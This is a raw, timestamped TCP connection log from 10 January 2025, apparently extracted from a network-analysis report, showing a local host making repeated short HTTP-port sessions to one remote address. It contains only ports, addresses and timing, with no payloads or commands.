Jan 10, 2025 09:00:26.358767986 CET	50130	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:26.363648891 CET	80	50130	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:26.478543043 CET	50132	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:26.483781099 CET	80	50132	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:26.483861923 CET	50132	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:26.484797001 CET	50132	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:26.487304926 CET	50133	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:26.489720106 CET	80	50132	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:26.489804983 CET	50132	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:26.492295980 CET	80	50133	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:26.492371082 CET	50133	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:26.492497921 CET	50133	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:26.497282028 CET	80	50133	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:27.148324966 CET	49736	80	192.168.2.4	147.124.216.113
Jan 10, 2025 09:00:27.422723055 CET	80	50133	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:27.423094034 CET	80	50133	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:27.423183918 CET	50133	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.423280001 CET	50133	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.428103924 CET	80	50133	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:27.538955927 CET	50134	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.543984890 CET	80	50134	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:27.546055079 CET	50134	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.546129942 CET	50134	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.552334070 CET	80	50134	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:27.552371025 CET	80	50134	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:27.552515984 CET	50134	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.603858948 CET	50135	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.608880997 CET	80	50135	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:27.608987093 CET	50135	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.609075069 CET	50135	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:27.613964081 CET	80	50135	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:28.527998924 CET	80	50135	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:28.528162956 CET	80	50135	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:28.528239012 CET	50135	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.528331041 CET	50135	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.533169031 CET	80	50135	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:28.651424885 CET	50136	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.656558037 CET	80	50136	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:28.656733036 CET	50136	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.656876087 CET	50136	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.659348011 CET	50137	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.661910057 CET	80	50136	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:28.661973953 CET	50136	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.664284945 CET	80	50137	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:28.664380074 CET	50137	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.664470911 CET	50137	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:28.669315100 CET	80	50137	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:29.615518093 CET	80	50137	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:29.615845919 CET	80	50137	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:29.616457939 CET	50137	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.616563082 CET	50137	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.621433020 CET	80	50137	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:29.730021000 CET	50138	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.735141993 CET	80	50138	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:29.735250950 CET	50138	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.735383034 CET	50138	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.737360001 CET	50139	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.740282059 CET	80	50138	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:29.740351915 CET	50138	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.742387056 CET	80	50139	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:29.742461920 CET	50139	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.742562056 CET	50139	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:29.747410059 CET	80	50139	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:30.650271893 CET	80	50139	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:30.650329113 CET	80	50139	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:30.650536060 CET	50139	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.650536060 CET	50139	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.655549049 CET	80	50139	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:30.764550924 CET	50140	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.769716024 CET	80	50140	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:30.769814014 CET	50140	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.769932032 CET	50140	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.771718979 CET	50141	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.774926901 CET	80	50140	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:30.774993896 CET	50140	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.776631117 CET	80	50141	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:30.776702881 CET	50141	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.776796103 CET	50141	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:30.781615973 CET	80	50141	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:31.708340883 CET	80	50141	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:31.708820105 CET	80	50141	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:31.708890915 CET	50141	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.716542959 CET	50141	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.721683979 CET	80	50141	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:31.833209038 CET	50142	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.838319063 CET	80	50142	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:31.838469028 CET	50142	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.838644981 CET	50142	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.840601921 CET	50143	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.843657017 CET	80	50142	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:31.843756914 CET	50142	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.845740080 CET	80	50143	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:31.845829010 CET	50143	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.846013069 CET	50143	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:31.850894928 CET	80	50143	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:32.800143003 CET	80	50143	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:32.800983906 CET	80	50143	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:32.801069975 CET	50143	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.801156044 CET	50143	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.806013107 CET	80	50143	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:32.924590111 CET	50144	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.929609060 CET	80	50144	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:32.929738998 CET	50144	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.929929972 CET	50144	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.931972027 CET	50145	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.935033083 CET	80	50144	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:32.935113907 CET	50144	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.936835051 CET	80	50145	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:32.936909914 CET	50145	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.937071085 CET	50145	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:32.941876888 CET	80	50145	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:33.891694069 CET	80	50145	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:33.891928911 CET	80	50145	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:33.892008066 CET	50145	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:33.892066956 CET	50145	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:33.896962881 CET	80	50145	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:34.008025885 CET	50146	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.013040066 CET	80	50146	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:34.013154984 CET	50146	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.013324976 CET	50146	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.018173933 CET	80	50146	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:34.018244982 CET	50146	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.053509951 CET	50147	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.058484077 CET	80	50147	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:34.058578968 CET	50147	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.067647934 CET	50147	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.072499990 CET	80	50147	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:34.989392996 CET	80	50147	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:34.990139008 CET	80	50147	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:34.990318060 CET	50147	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.990318060 CET	50147	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:34.995717049 CET	80	50147	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:35.110807896 CET	50148	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:35.116305113 CET	80	50148	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:35.116432905 CET	50148	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:35.116607904 CET	50148	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:35.119007111 CET	50149	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:35.121490955 CET	80	50148	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:35.121562004 CET	50148	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:35.123954058 CET	80	50149	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:35.124026060 CET	50149	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:35.124136925 CET	50149	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:35.128983021 CET	80	50149	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:36.047362089 CET	80	50149	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:36.047493935 CET	80	50149	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:36.047585011 CET	50149	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.047677040 CET	50149	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.052565098 CET	80	50149	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:36.169430971 CET	50150	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.175049067 CET	80	50150	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:36.175290108 CET	50150	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.175451040 CET	50150	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.177870989 CET	50151	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.180494070 CET	80	50150	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:36.180680990 CET	50150	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.182846069 CET	80	50151	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:36.182931900 CET	50151	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.183043957 CET	50151	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:36.187922001 CET	80	50151	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:37.089878082 CET	80	50151	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:37.090147972 CET	80	50151	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:37.090207100 CET	50151	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.090257883 CET	50151	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.095104933 CET	80	50151	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:37.204832077 CET	50152	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.209989071 CET	80	50152	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:37.210062981 CET	50152	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.210171938 CET	50152	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.212059975 CET	50153	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.215181112 CET	80	50152	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:37.215236902 CET	50152	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.216964006 CET	80	50153	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:37.217036009 CET	50153	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.217168093 CET	50153	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:37.221986055 CET	80	50153	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:38.136305094 CET	80	50153	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:38.136360884 CET	80	50153	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:38.136437893 CET	50153	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.136668921 CET	50153	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.141516924 CET	80	50153	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:38.258940935 CET	50154	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.263968945 CET	80	50154	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:38.264058113 CET	50154	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.264177084 CET	50154	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.267080069 CET	50155	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.269119024 CET	80	50154	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:38.269180059 CET	50154	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.271991014 CET	80	50155	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:38.272078991 CET	50155	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.272300959 CET	50155	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:38.277137995 CET	80	50155	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:39.222901106 CET	80	50155	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:39.223437071 CET	80	50155	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:39.223645926 CET	50155	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.223645926 CET	50155	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.229111910 CET	80	50155	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:39.346199989 CET	50156	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.351591110 CET	80	50156	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:39.351933002 CET	50156	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.352015972 CET	50156	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.354573011 CET	50157	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.357075930 CET	80	50156	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:39.357161045 CET	50156	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.359556913 CET	80	50157	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:39.359780073 CET	50157	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.359817028 CET	50157	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:39.364881039 CET	80	50157	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:40.278882980 CET	80	50157	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:40.279309988 CET	80	50157	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:40.279519081 CET	50157	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.279519081 CET	50157	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.284972906 CET	80	50157	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:40.401927948 CET	50158	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.407191992 CET	80	50158	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:40.407310963 CET	50158	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.407490969 CET	50158	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.409810066 CET	50159	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.412456036 CET	80	50158	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:40.412630081 CET	50158	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.414686918 CET	80	50159	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:40.414767027 CET	50159	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.414895058 CET	50159	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:40.419894934 CET	80	50159	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:41.347810984 CET	80	50159	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:41.348304987 CET	80	50159	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:41.348382950 CET	50159	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.348473072 CET	50159	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.353382111 CET	80	50159	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:41.482083082 CET	50160	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.487018108 CET	80	50160	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:41.487107038 CET	50160	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.487267971 CET	50160	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.490199089 CET	50161	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.492264986 CET	80	50160	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:41.492328882 CET	50160	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.495059013 CET	80	50161	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:41.495142937 CET	50161	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.495275974 CET	50161	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:41.500221014 CET	80	50161	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:42.407859087 CET	80	50161	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:42.409410954 CET	80	50161	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:42.409522057 CET	50161	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.409568071 CET	50161	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.414446115 CET	80	50161	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:42.532111883 CET	50162	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.537163019 CET	80	50162	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:42.537266970 CET	50162	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.537425041 CET	50162	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.539891958 CET	50163	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.542269945 CET	80	50162	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:42.542340994 CET	50162	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.544717073 CET	80	50163	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:42.544789076 CET	50163	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.544972897 CET	50163	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:42.549794912 CET	80	50163	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:43.472117901 CET	80	50163	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:43.472178936 CET	80	50163	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:43.472253084 CET	50163	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.472434044 CET	50163	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.478435040 CET	80	50163	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:43.595381975 CET	50164	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.600730896 CET	80	50164	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:43.600874901 CET	50164	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.601051092 CET	50164	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.603892088 CET	50165	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.605952978 CET	80	50164	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:43.606044054 CET	50164	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.608833075 CET	80	50165	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:43.608927965 CET	50165	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.609070063 CET	50165	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:43.613859892 CET	80	50165	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:44.560300112 CET	80	50165	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:44.560354948 CET	80	50165	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:44.560429096 CET	50165	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.560677052 CET	50165	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.565557003 CET	80	50165	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:44.683109999 CET	50166	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.688797951 CET	80	50166	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:44.689255953 CET	50166	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.689361095 CET	50166	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.691807032 CET	50167	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.694756985 CET	80	50166	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:44.695072889 CET	50166	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.697000980 CET	80	50167	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:44.697218895 CET	50167	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.697309017 CET	50167	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:44.702301979 CET	80	50167	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:45.646708012 CET	80	50167	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:45.647011042 CET	80	50167	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:45.647099018 CET	50167	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.647099972 CET	50167	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.652128935 CET	80	50167	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:45.774812937 CET	50168	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.780056000 CET	80	50168	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:45.780143023 CET	50168	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.780235052 CET	50168	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.785327911 CET	80	50168	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:45.785403967 CET	50168	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.834577084 CET	50169	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.839705944 CET	80	50169	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:45.839824915 CET	50169	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.840106010 CET	50169	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:45.845226049 CET	80	50169	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:46.772366047 CET	80	50169	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:46.772470951 CET	80	50169	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:46.772552013 CET	50169	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.800127983 CET	50169	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.804994106 CET	80	50169	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:46.924520969 CET	50170	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.929646015 CET	80	50170	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:46.929755926 CET	50170	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.929841995 CET	50170	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.931628942 CET	50171	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.934822083 CET	80	50170	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:46.934905052 CET	50170	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.936508894 CET	80	50171	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:46.936600924 CET	50171	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.936789036 CET	50171	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:46.941610098 CET	80	50171	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:47.850775957 CET	80	50171	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:47.850923061 CET	80	50171	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:47.850995064 CET	50171	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:47.851042032 CET	50171	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:47.855988026 CET	80	50171	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:47.967634916 CET	50172	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:47.972995043 CET	80	50172	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:47.973092079 CET	50172	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:47.973211050 CET	50172	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:47.979371071 CET	80	50172	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:47.979433060 CET	50172	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:48.001286030 CET	50173	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:48.006575108 CET	80	50173	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:48.006665945 CET	50173	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:48.006787062 CET	50173	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:48.011620045 CET	80	50173	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:48.919415951 CET	80	50173	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:48.919471025 CET	80	50173	166.62.27.188	192.168.2.4
Jan 10, 2025 09:00:48.919568062 CET	50173	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:48.919699907 CET	50173	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:00:48.924597025 CET	80	50173	166.62.27.188	192.168.2.4
